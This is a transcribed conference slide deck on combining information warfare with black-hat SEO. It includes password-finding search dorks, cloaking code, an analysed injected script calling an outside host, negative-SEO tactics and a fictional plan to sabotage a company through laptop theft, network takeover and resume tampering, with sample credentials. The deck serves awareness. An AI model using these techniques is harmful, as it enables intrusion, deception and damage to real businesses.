Small treatise about e-manipulation for honest people
Transcription
Small treatise about e-manipulation for honest people
Introduction Information based attacks Search engine optimization Once upon a time. . . Small treatise about e-manipulation for honest people F. Raynal & F. Gaspard Information based attacks in the Internet Frédéric Raynal Sogeti / Cap Gemini – MISC magazine fred(at)security-labs.org frederic.raynal(at)sogeti.com François Gaspard New Zealand Telecom International fg(at)tnzi.com kad(at)miscmag.com Small treatise about e-manipulation for honest people 1/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Storybook Attacking with no limit Information warfare : often restricted to information as a contents Hacking : often restricted to a technical exploit What if we merge both ? ⇒ Attacking with both the content and the container F. Raynal & F. Gaspard Information based operations : deception, intoxication, misinformation,. . . Technical operation : Search Engine Optimization as a mean to emphasize the information we want Small treatise about e-manipulation for honest people 2/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 3/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate (Short and inaccurate) Summary of Information warfare 2 kinds of orientation Information management in order to achieve information dominance Use information to produce knowledge Others have to run after you to keep up-to-date Information used as a weapon F. Raynal & F. Gaspard Dominance is one goal, not the only one Think also of deception, intoxication or misinformation, . . . Small treatise about e-manipulation for honest people 4/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Information based attacks (IBA) F. Raynal & F. Gaspard Collect Human Newspapers Internet Propagate Newspapers leaflets Web sites Consumers Researchers Journalists Recruit Articles Interviews Books Arm Small treatise about e-manipulation for honest people 5/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Roadmap 1 Information based attacks Collect Recruit Arm Propagate 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 6/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Collect Where to gather information on the Internet Google, MSN, yahoo,. . . , only see 10% of the web ! Ex. : social networks websites (Linkedin, orkut, twitter, facebook,. . . ) Use the appropriate tool depending on the information you are looking for : Ex. : Federal Funding Accountability and Transparence (FFATA) for contracts with the US government Perimeter of a network has become from known to blurred Perimeter of information is out of control. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 7/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Google Hacking Fun and profits Finding passwords inurl :passwd.txt (1st result in google.com : WebAdmin :aeYYajmW204V6) Owned websites intitle :"hacked by" : imaginative pictures. . . intitle :tt2.swi : compromised websites installing a java trojan Entertainment F. Raynal & F. Gaspard intitle :"Live View / - AXIS" | inurl :view/view.shtml : some surveillance cams site :free.fr intitle :"index of" mp3 : p2p outdated Small treatise about e-manipulation for honest people 8/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Roadmap 1 Information based attacks Collect Recruit Arm Propagate 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 9/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Recruit Populate the attackers Infiltrate where they already are Stay hidden as much as possible : tor, open proxies, open WiFi, . . . Create your own contesting Opposition website : federate all opponents at one place F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 10/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Opposition website : jeboycotteDanone.com F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 11/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Roadmap 1 Information based attacks Collect Recruit Arm Propagate 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 12/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Arm : battlefield == the Internet There is life outside the Internet Consequences, answers to our actions can be lead outside of the Internet Combining it with others battlefields is more efficient : law suits, finance, information in newspapers or leaflets, . . . Internet howto Websites are spread all over the Internet Add websites under your control A human looks for an information Spread information on the Internet, push it to the user The results are found according to search engines Change the results by tricking the search engines F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 13/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Usual attacks Using information to attack Intoxication : attempt to misguide the interpretations, the reasoning of the target, that is its analysis capacities Ex. : spreading a wrong information, ”false/false” strategy Ex. : change the content of a website according to who comes Deception : can be either based on hiding (e.g. camouflage, blinding) or simulation (create, lure, invent) Ex. : WW2, when false military bases were created in order to abuse the German on the d-day location Ex. : abuse search engines to warp the results Misinformation : based on alteration, removal, addition and so on of information F. Raynal & F. Gaspard Ex. : the supposed lethal benzene in the bottles of Perrier Ex. : hoaxes, rumors spreading from a forum to another one, then by mail, and so on Small treatise about e-manipulation for honest people 14/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Roadmap 1 Information based attacks Collect Recruit Arm Propagate 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 15/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Collect Recruit Arm Propagate Propagate Organize knowledge to export the battle Increase the doubts toward the target in the public Increase the bad consciousness of the target itself Questions and answers What if you can increase the perception of all our vectors and in the same time, decrease the perception of the target’s answers ? ⇒ Where SEO comes into play . . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 16/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 17/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Definitions Web Spam The practice of manipulating web pages in order to cause search engines to rank some web pages higher than they would without any manipulation. Search engine optimization (SEO) [?] SEO is the process of improving the volume and quality of traffic to a web site from search engines via ”natural” (”organic” or ”algorithmic”) search results for targeted keywords. F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 18/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Why/How would I do SEO ? Motives Users trust search engines as a means of finding information ⇒ Exploit this trust Users usually do not look past the first ten results returned by the search engine ⇒ Exploit this laziness A matter of color White hat SEO : a site conforms to the search engines’ guidelines and involves no deception Black hat SEO : attempts to improve rankings in ways that are disapproved of by the search engines, or involve deception F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 19/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Roadmap 1 Information based attacks 2 Search engine optimization White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 20/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO A quick overview of White Hat SEO Usual guidelines Keywords : be creative, avoid generic keywords Architecture : page rank computed according to {in|out}coming links Content : need to be innovative and refreshed regularly ⇒ Guidelines are not written as a series of rules Strategy : long term, no deception Create content for users, not for search engines Make that content easily accessible to the spiders ⇒ Content indexed by SE is the same as the one seen by users F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 21/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Roadmap 1 Information based attacks 2 Search engine optimization White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 22/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO A quick overview of Black Hat SEO Spam web for profit : online pharmacy industry [?] Many industries prefer not to spam directly (due to anti-spam laws in US & Europe) They create an affiliate program ⇒ Sales increase : regular incomes thanks to affiliate ⇒ Limited Liability : affiliate used as escape goat How some affiliation programs allow to spam ? No terms of agreement at the sign-up page Some companies operate in jurisdiction where spam is not illegal (ex. Seychelles) Spam is ”restricted” to email spam F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 23/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Black Hat SEO is a myth. . . or not F. Raynal & F. Gaspard [?] Small treatise about e-manipulation for honest people 24/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO A quick overview of Black Hat SEO Strategy : short term, deception Content indexed by SE is often different from the one seen by users Most techniques are nasty, some are illegal A few basic examples Content spam : altering the view of a SE over a page Invisible text, keyword stuffing, doorway page, scraper sites,. . . Link spam : take advantage of link-based ranking algorithms Link farms, hidden links, sybil attacks, spam blogs, page hijacking, . . . World-writable spam : add links to sites editable by users F. Raynal & F. Gaspard Blog entries, forums, wikis, referrer spamming, . . . Small treatise about e-manipulation for honest people 25/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Roadmap 1 Information based attacks 2 Search engine optimization White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 26/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Cloaking Goal Modify the content of the page according to the parameters Cloaking for dummies User agent cloaking : change page depending on who comes i f ( s t r p o s ( $ SERVER [ " H T T P _U S E R _ A G EN T " ] , " Googlebot " ) ) { i n c l u d e ( " googlebot - special . html " ) ; } else { // display real page } IP cloaking : change page depending on where a request comes from $ip F. Raynal & F. Gaspard = s t r v a l ( $ SERVER [ " REMOTE_ADDR " ] ) Small treatise about e-manipulation for honest people 28/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO A(n in)famous example : spider view of bmw.de F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 29/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO A(n in)famous example : human view of bmw.de F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 30/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Solving captcha Goal Automatic registration to forums, post comments on blogs, . . . Captcha for dummies [?] Remove the background : denoising Join points in the letters : filtering Derotate the letters : geometric transformation Read the letters : pattern recognition F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 31/59 Introduction Information based attacks Search engine optimization Once upon a time. . . Solving captcha : phpbb2 F. Raynal & F. Gaspard White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO [?] Small treatise about e-manipulation for honest people 32/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Real case : who wants certified viagra (1/3) F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 33/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Real case : certified viagra at university (2/3) http ://spirit.dos.uci.edu/interfaith/ ?page=254 User clicks on 2nd answer, trusting the .edu PR : 6/10 – Backlinks : 3420 Site runs Nucleus CMS v3.23 (current : 3.32) Flaw in default skin allows to inject code in generated pages : < s c r i p t s r c=" http :// focusa . net / gcoxiio . js "></s c r i p t > gcoxiio.js redirects depending on the referer : Referer : www.google.fr/search ?q=certified+viagra&ie=utf-8 Redirection : i f ( document . r e f e r r e r . toLowerCase ( ) . i n d e x O f ( ’ viagra ’)!= −1) l o c a t i o n . h r e f=’ http :// pillsonline . biz / viagra . htm ’ ; User is redirected to http ://pillsonline.biz/viagra.htm F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 35/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Real case : pills online (3/3) F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 36/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Roadmap 1 Information based attacks 2 Search engine optimization White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 37/59 Introduction Information based attacks Search engine optimization Once upon a time. . . White Hat SEO Black Hat SEO Advanced examples Aggressive Black Hat SEO Black Hat SEO reversed Goal Decrease page rank of competitors’ websites Some nasty but legal ideas. . . Inject poison keywords to the target’s website : sex, drug, medicine, viagra, casino. . . Google browling : add links to the target from many bad sites Even better with blacklisted websites ! Google Washing : use an old domain you own to duplicate the content of the target’s website, then report the target as duplicate content ⇒ SE will ban the newest And many more ! ! ! F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 38/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 39/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Situation Players Proctor : a french IT consulting company Limited resources, driven by cost killing Tonton : an indian IT consulting company Many men at work cheaper than european ones Comments Goal : Tonton wants to enter the European market Vector : buy a well known local company, Proctor Mean : exhaust Protor’s resource so that it need helps Limit : do not deteriorate too much Proctor’s image F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 40/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 41/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : the main strategy Marry me Tonton propose a partnership to Proctor : A big big (and lucrative) contract in India, where Proctor wants to grow Proctor must propose to Tonton other contracts in Europe where Proctor wants to find partners The 1st indian contract is really interresting for Proctor Tonton gives next other (rotten) contracts to Proctor on the India markets Results Proctor : resources consumed in several markets, new businesses, lawsuits Tonton : internal view of Proctor, cheaper resources involved F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 42/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : the main strategy F. Raynal & F. Gaspard I n d i a Tonton & Proctor negociate T&P answer (and win) a 1st big contract Contract for P Contract for P Lot of work Small benefits Contract for T Lawsuits a T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Small treatise about e-manipulation for honest people 43/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : drug the salesmen of Proctor Happiness or deception for the groom Provide a nice clients list to several salesmen ⇒ consume energy trying to reach them Invitation to tender : identify them and gives them to Proctor ⇒ consume energy trying to win them Hire away salesmen : show them life is better somewhere else ⇒ cause internal tensions and resignation Results Proctor : salesmen will be busy as they have never been, goal being to saturate them Tonton : learn the european market with the watcher, wait for exhaustion F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 44/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : drug the salesmen F. Raynal & F. Gaspard I n d i a P a r i s T + PR Contract for P T&P answer (and win) a 1st big contract Tonton & Proctor negociate Exhibitions T puts watchers on .fr's markets Contract for P Visitors lists Lot of work Small benefits Contract for T Lawsuits Clients list given to salesmen Hire away salesmen a Many invitations to tender T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Small treatise about e-manipulation for honest people 45/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 46/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : life-in-IT-consulting.org Time for opposition Currently no website on life and business in IT consulting ⇒ create one, promote it Use contacts found during information gathering to provide inputs Contact a PR agency to promote the articles (propose interesting and new content ! ! !) Use white hat SEO to enforce the visibility Never target directly Proctor ⇒ We have created a very efficient long-term influence tool F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 47/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : life-in-IT-consulting.org F. Raynal & F. Gaspard I n d i a P a r i s T + PR Contract for P T&P answer (and win) a 1st big contract Tonton & Proctor negociate Exhibitions T puts watchers on .fr's markets Contract for P Lot of work Small benefits Contract for T Lawsuits Clients list given to salesmen Visitors lists Hire away salesmen a Many invitations to tender inform S E O www.Life-in-itconsulting.org Workers Former workers Clients PR => press "bad" content salary study T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Small treatise about e-manipulation for honest people 48/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : aggressive SEO to shut up Proctor The sound of silence Google bowling : create many backlinks to Proctor from ”bad” websites (racist, sex, drugs, online casino, . . . ) Create ”bad” websites with the same keywords as Proctor Use blacklisted websites to link with Proctor Duplicate content : find or create duplicate content on Proctor’s website Use blogs, forum, . . . , to have many links pointing to the same page http://proctor.com/blogs?lang=fr http://proctor.com/blogs?lang=en Link farm : automatically create many websites dealing with Proctor having many many many links to Proctor F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 50/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : aggressive SEO to shut up Proctor F. Raynal & F. Gaspard I n d i a P a r i s T + PR Contract for P T&P answer (and win) a 1st big contract Tonton & Proctor negociate Exhibitions T puts watchers on .fr's markets Contract for P Lot of work Small benefits Contract for T Lawsuits Clients list given to salesmen Visitors lists Hire away salesmen a Many invitations to tender inform S E O www.Life-in-itconsulting.org Workers Former workers Clients PR => press "bad" content salary study Link farms S E O proctor.com Google washing Google bowling Flaw exploitation T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Small treatise about e-manipulation for honest people 51/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Roadmap 1 Information based attacks 2 Search engine optimization 3 Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 52/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : owning the local network F. Raynal & F. Gaspard One laptop stolen is the key to everything. . . Printing Server jdupont : ******** Administrator : (vide) jdupont empty pwd sqlserver / sa DB Server admprov : ******* admsql : ****** srvadm : srv0dm admprov 2 domain controlers 1289 accounts 8 admin Administrator (********) jrichard (********) jdupont (********) jkevin (********) dvador (********) samva (********) cveso (********!) obade (********) File and printing servers Standard station locadm : ******** locuser : qwerty locadm rv weak password known password Backup Server + master sv_deploy : d3pl0y75 Administrator : $admin$ Project rv : rv Administrator : ******* Administrator Several servers (Lotus Notes, mails, ...) Small treatise about e-manipulation for honest people 53/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : owning the local network F. Raynal & F. Gaspard I n d i a P a r i s T + PR Contract for P T&P answer (and win) a 1st big contract Tonton & Proctor negociate Exhibitions T puts watchers on .fr's markets Contract for P Lot of work Small benefits Contract for T Lawsuits Clients list given to salesmen Visitors lists Hire away salesmen a Many invitations to tender inform S E O www.Life-in-itconsulting.org Workers Former workers Clients PR => press "bad" content salary study Link farms S E O proctor.com Google bowling L A N Steal laptop Own AD Own www Google washing Flaw exploitation Poison keywords Cloaking noise Own SMTP T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Small treatise about e-manipulation for honest people 54/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : when human (resources) is the weak link Hiring away people Focus on identified key people and send them (better) job proposal Use the access to the LAN to get the resumes of all engineers, spread them on the Internet : some competitors will know what to do with them Hiring process : hunting ghosts People tracking resumes on the Internet are searching in the same few sites : make the access to these sites difficult Either on the proxy or the (shared) storage place, change what looks like email address or phone number in resumes : people will be much more difficult to reach F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 55/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Buying Proctor : when human (resources) is the weak link F. Raynal & F. Gaspard I n d i a P a r i s T + PR Contract for P T&P answer (and win) a 1st big contract Tonton & Proctor negociate Exhibitions T puts watchers on .fr's markets Contract for P Lot of work Small benefits Contract for T Lawsuits Clients list given to salesmen Visitors lists Hire away salesmen a Many invitations to tender inform S E O www.Life-in-itconsulting.org Workers Former workers Clients PR => press "bad" content Articles salary study inform Link farms S E O proctor.com Google bowling L A N Steal laptop Own www Own AD H R T : Tonton (indian cie) P: Proctor (european cie) PR: Public Relation Flaw exploitation Poison keywords Cloaking noise Own SMTP steal Key people Recruitment process Google washing leak CVs send to Recruitment offices Hire away Fake resumes Warp resumes Sites maintenance Small treatise about e-manipulation for honest people 56/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Conclusion Mixing everything in a clever way Attacking with information is complex but difficult to oppose Attacker has the initiative, a real advantage Quite easy (with time but no mean) to amplify the attack SEO is a mix of following guidelines, cleverness and hacking Usually applied on our own website (thus information) Can also be applied by everyone on anybody’s website ⇒ Mixing both is really efficient F. Raynal & F. Gaspard The Internet is realy well suited to propagate information (e.g. deception, misinformation, intoxication) Content (information) is emphasize thanks to container (SEO) Do not forget you can also combine with other tricks from other fields Small treatise about e-manipulation for honest people 57/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking Q & (hopefully) A F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 58/59 Introduction Information based attacks Search engine optimization Once upon a time. . . The main strategy White ops based on SEO Black ops based on hacking References I Search engine optimization http ://en.wikipedia.org/wiki/Search engine optimization Captcha Breaking W/ PHPBB2 Example http ://www.bluehatseo.com/user-contributed-captcha-breaking-w-phpbb2-examp Page Hijack : The 302 Exploit, Redirects and Google http ://clsc.net/research/google-302-page-hijack.htm Web spam techniques R. S. Liverani – http ://malerisch.net/docs/web spam techniques/web spam techniques.html F. Raynal & F. Gaspard Small treatise about e-manipulation for honest people 59/59